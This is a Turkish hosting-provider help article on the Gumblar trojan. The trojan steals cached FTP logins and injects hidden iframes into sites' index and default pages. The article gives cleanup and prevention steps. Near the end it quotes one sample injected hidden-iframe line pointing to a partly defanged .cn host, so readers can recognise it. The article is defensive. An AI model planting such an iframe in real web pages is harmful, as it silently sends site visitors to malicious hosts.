Website iframe virüsü

Iframe virüsü olarak da bilinen trojan Gumblar,  sayfalarınıza iframe kod eklemektedir. Trojanın hedefinde web hostinginiz bulunmaktadır.

Pekçok webmaster site güncellemesi yaparken ücretsiz yada crack  Ftp programı kullanarak  dosyaları web sunucusuna yüklemektedir.    Trojan ftp bilgilerinize  cache ler üzerinden erişip sizin yerinize web sayfalarınızda bazı değişiklikler yapmaktadır.

Genel olarak index ve default isimleri ile başlayanweb içeriğinize saldırır. Bu dosyaların uzantısı *.aspx, *.html, *.php, *.asp ve diğer web content uzantıları olabilir.  Siz username ve password ünüzü kendi ellerinizle teslim etmiş oluyorsunuz.  Gerekli önlemleri alırsanız korunmanız mümkündür.

Bu önlemler;

  • Hiçbir zaman username ve password ünüzü “Bir dahaki sefere hatırla” şeklinde konfigure etmeyiniz. Bu zaten passwordünüz siz login olsanız da olmasanız da makinenizde bir yerlerde saklanıyor olması demektir.
  • Kırılmış veya geniş kitleler tarafından kabul görmemiş ftp client yazılımları kullanmayın. Bizim tasiyemiz FileZilla dır. Bu linkten indirebilirsiniz. https://www.globalhosting.com.tr/knowledgebase.php?action=displayarticle&id=2
  • Eğer bir şekilde bu trojana yakalanırsanız derhal hostinginiz ile ilgili tüm username ve password lerinizi değiştiriniz.
  • Web tarayıcınızın tüm önbelliğini siliniz, boşaltınız. Kayıtlı username ve password lerinizi siliniz. Cache belleği boşaltınız.
  • Güncel virus definition verilerine sahip bir virus tarayıcı ile (kaspersky is)  sisteminizi taratınız ve bu virusun bulunduğunu söylendiği dosyaları temizleyiniz.
  • Web hostinginizde bulunan tüm dosyaları local dizininize indirip virus taramasından geçiriniz. Anti virus yazılımı olarak bizim önerimiz kaspersky internet security kullanınız. http://www.kaspersky.com.tr/yuklemeler.html de 30 günlük free versiyonu mevcuttur.
  • İlgili dosyaları silmeyip yalnızca gerekli kod satırını silerek edit ediniz. Ya da  hostiniginizdeki dosyalarınızı orjinal yedekleri ile değiştiriniz.

Örnek vermek gerekirse bu trojan sitenize bulaştıktan sonra aşağıdaki gibi bir satırı sitenize enjekte etmektedir. Yukarda sıraladığımız önlemeleri alıp bu satırı kod içinden temizlediğinizde sorundan kurtulabilirsiniz.

<iframe src=”http: // dfsdfsdfdsfdsfds .cn / yyyyyy / in.cgi?pepsi” width=3 height=5 style=”visibility: hidden”></iframe>

Comments

  1. By SELMAN ACUN

  2. By BATUHAN ÇAĞATAY

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak.

yazilan makaleler izinsiz kopyalanamaz aksi taktirde dmca tarafindan gerekli islemler baslatilacaktir.